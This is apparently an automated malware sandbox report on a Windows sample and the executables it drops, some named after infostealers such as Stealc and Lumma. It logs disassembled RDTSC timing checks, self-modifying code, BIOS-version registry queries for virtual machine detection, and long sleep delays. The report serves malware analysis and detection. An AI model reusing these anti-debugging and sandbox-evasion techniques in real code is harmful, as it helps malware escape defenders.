                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB01B2 second address: 4AB01EE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4B90BE6238h 0x00000008 adc eax, 2F7C1288h 0x0000000e jmp 00007F4B90BE622Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edi, 224486F6h 0x00000020 mov dl, 1Ch 0x00000022 popad 0x00000023 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB01EE second address: 4AB0214 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0214 second address: 4AB0218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0218 second address: 4AB022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB022B second address: 4AB0265 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6239h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4B90BE6238h 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0265 second address: 4AB0274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0274 second address: 4AB0300 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6239h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ah, bl 0x0000000d pushad 0x0000000e mov dx, cx 0x00000011 movzx esi, bx 0x00000014 popad 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 jmp 00007F4B90BE622Dh 0x0000001c test esi, esi 0x0000001e pushad 0x0000001f push ecx 0x00000020 jmp 00007F4B90BE6233h 0x00000025 pop esi 0x00000026 pushfd 0x00000027 jmp 00007F4B90BE6239h 0x0000002c xor al, FFFFFF96h 0x0000002f jmp 00007F4B90BE6231h 0x00000034 popfd 0x00000035 popad 0x00000036 je 00007F4C038C4547h 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0300 second address: 4AB0306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0306 second address: 4AB030C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB030C second address: 4AB0310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0310 second address: 4AB0342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4B90BE6237h 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0342 second address: 4AB03D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C0400B962h 0x0000000f jmp 00007F4B9132D69Eh 0x00000014 mov edx, dword ptr [esi+44h] 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F4B9132D69Eh 0x0000001e jmp 00007F4B9132D6A5h 0x00000023 popfd 0x00000024 movzx ecx, bx 0x00000027 popad 0x00000028 or edx, dword ptr [ebp+0Ch] 0x0000002b jmp 00007F4B9132D6A3h 0x00000030 test edx, 61000000h 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 call 00007F4B9132D6A2h 0x0000003e pop eax 0x0000003f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB03D2 second address: 4AB0411 instructions: 0x00000000 rdtsc 0x00000002 call 00007F4B90BE622Bh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, edi 0x0000000c popad 0x0000000d jne 00007F4C038C44C9h 0x00000013 pushad 0x00000014 mov si, dx 0x00000017 mov edi, 2E5383E0h 0x0000001c popad 0x0000001d test byte ptr [esi+48h], 00000001h 0x00000021 pushad 0x00000022 call 00007F4B90BE6235h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0411 second address: 4AB045D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushfd 0x00000006 jmp 00007F4B9132D6A7h 0x0000000b and ch, 0000006Eh 0x0000000e jmp 00007F4B9132D6A9h 0x00000013 popfd 0x00000014 popad 0x00000015 jne 00007F4C0400B8EBh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov si, di 0x00000021 mov di, 6FDAh 0x00000025 popad 0x00000026 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB045D second address: 4AB0463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0463 second address: 4AB0474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test bl, 00000007h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0474 second address: 4AB0478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0478 second address: 4AB047C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB047C second address: 4AB0482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0843 second address: 4AA08A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4B9132D6A2h 0x0000000f sub cl, FFFFFFD8h 0x00000012 jmp 00007F4B9132D69Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007F4B9132D6A6h 0x00000020 and esp, FFFFFFF8h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F4B9132D69Ah 0x0000002c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA08A1 second address: 4AA08A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA08A5 second address: 4AA08AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA08AB second address: 4AA08B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA08B1 second address: 4AA08B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA08B5 second address: 4AA08DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6238h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov cx, F4E3h 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA08DB second address: 4AA0917 instructions: 0x00000000 rdtsc 0x00000002 mov ax, FC3Fh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F4B9132D6A4h 0x0000000d mov bx, si 0x00000010 pop ecx 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4B9132D6A6h 0x0000001c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0917 second address: 4AA091D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA091D second address: 4AA095E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushfd 0x00000007 jmp 00007F4B9132D6A9h 0x0000000c add ecx, 1940E2A6h 0x00000012 jmp 00007F4B9132D6A1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA095E second address: 4AA0985 instructions: 0x00000000 rdtsc 0x00000002 mov dl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edi, 32E0E848h 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4B90BE6236h 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0985 second address: 4AA0989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0989 second address: 4AA098F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA098F second address: 4AA09A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B9132D69Dh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA09A0 second address: 4AA09A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA09A4 second address: 4AA0A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b jmp 00007F4B9132D69Dh 0x00000010 mov esi, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F4B9132D69Ch 0x0000001a adc ax, D838h 0x0000001f jmp 00007F4B9132D69Bh 0x00000024 popfd 0x00000025 call 00007F4B9132D6A8h 0x0000002a mov ecx, 05F42AF1h 0x0000002f pop eax 0x00000030 popad 0x00000031 mov ebx, 00000000h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0A08 second address: 4AA0A0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0A0C second address: 4AA0A12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0A12 second address: 4AA0A78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, eax 0x00000005 pushfd 0x00000006 jmp 00007F4B90BE6238h 0x0000000b add ax, 1428h 0x00000010 jmp 00007F4B90BE622Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test esi, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F4B90BE622Bh 0x00000024 add ch, 0000006Eh 0x00000027 jmp 00007F4B90BE6239h 0x0000002c popfd 0x0000002d mov eax, 6B2EDEF7h 0x00000032 popad 0x00000033 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0A78 second address: 4AA0AD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C04012F9Bh 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 mov cx, F8DFh 0x00000017 popad 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f pushad 0x00000020 mov ecx, 3D9724D7h 0x00000025 pushad 0x00000026 call 00007F4B9132D69Ah 0x0000002b pop eax 0x0000002c mov di, B706h 0x00000030 popad 0x00000031 popad 0x00000032 mov ecx, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F4B9132D6A8h 0x0000003b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0AD3 second address: 4AA0B13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C038CBAE7h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F4B90BE6234h 0x00000016 and si, 7008h 0x0000001b jmp 00007F4B90BE622Bh 0x00000020 popfd 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                                    Tries to evade debugger and weak emulator (self modifying code)
                                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E0EA47 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E0EB15 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: FB83B6 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E0EA41 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: E1EA47 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: E1EB15 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: FC83B6 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: E1EA41 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSpecial instruction interceptor: First address: 461BBB instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSpecial instruction interceptor: First address: 461BEF instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSpecial instruction interceptor: First address: 605912 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeSpecial instruction interceptor: First address: 68E8FC instructions caused by: Self-modifying code
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSpecial instruction interceptor: First address: 7A1BBB instructions caused by: Self-modifying code
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSpecial instruction interceptor: First address: 7A1BEF instructions caused by: Self-modifying code
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSpecial instruction interceptor: First address: 945912 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeSpecial instruction interceptor: First address: 9CE8FC instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSpecial instruction interceptor: First address: 14E9BE instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSpecial instruction interceptor: First address: 30EBAA instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSpecial instruction interceptor: First address: 2F0FAB instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeSpecial instruction interceptor: First address: 373F69 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 75E9BE instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 91EBAA instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 900FAB instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSpecial instruction interceptor: First address: 983F69 instructions caused by: Self-modifying code
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory allocated: C30000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory allocated: 2770000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeMemory allocated: 26A0000 memory reserve | memory write watch
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 1400000 memory reserve | memory write watch
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 3010000 memory reserve | memory write watch
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2E40000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                    Source: C:\Users\user\Desktop\file.exeCode function: 6_2_04B20892 rdtsc 6_2_04B20892
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 4229Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 4245Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow / User API: threadDelayed 8501Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeWindow / User API: threadDelayed 5856Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow / User API: threadDelayed 1181Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow / User API: threadDelayed 1165Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow / User API: threadDelayed 1156Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow / User API: threadDelayed 392Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow / User API: threadDelayed 1141Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1111
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1104
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1116
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 383
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1098
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow / User API: threadDelayed 1139
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow / User API: threadDelayed 1205
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow / User API: threadDelayed 1075
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow / User API: threadDelayed 1081
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeWindow / User API: threadDelayed 398
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 3631
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\66ed86be077bb_12[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000321001\2.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\splwow64[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\needmoney[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000314001\LummaC222222.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\newbundle2[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\2[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\Blenar[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000340001\Blenar.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000285001\2.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\LummaC222222[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000318001\66ed86be077bb_12.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeAPI coverage: 2.9 %
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7436Thread sleep count: 43 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7436Thread sleep time: -86043s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7412Thread sleep count: 138 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7412Thread sleep time: -276138s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7396Thread sleep count: 272 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7396Thread sleep time: -8160000s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7512Thread sleep time: -180000s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7424Thread sleep count: 141 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7424Thread sleep time: -282141s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7432Thread sleep count: 130 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7432Thread sleep time: -260130s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7408Thread sleep count: 4229 > 30Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7408Thread sleep time: -8462229s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7416Thread sleep count: 4245 > 30Jump to behavior
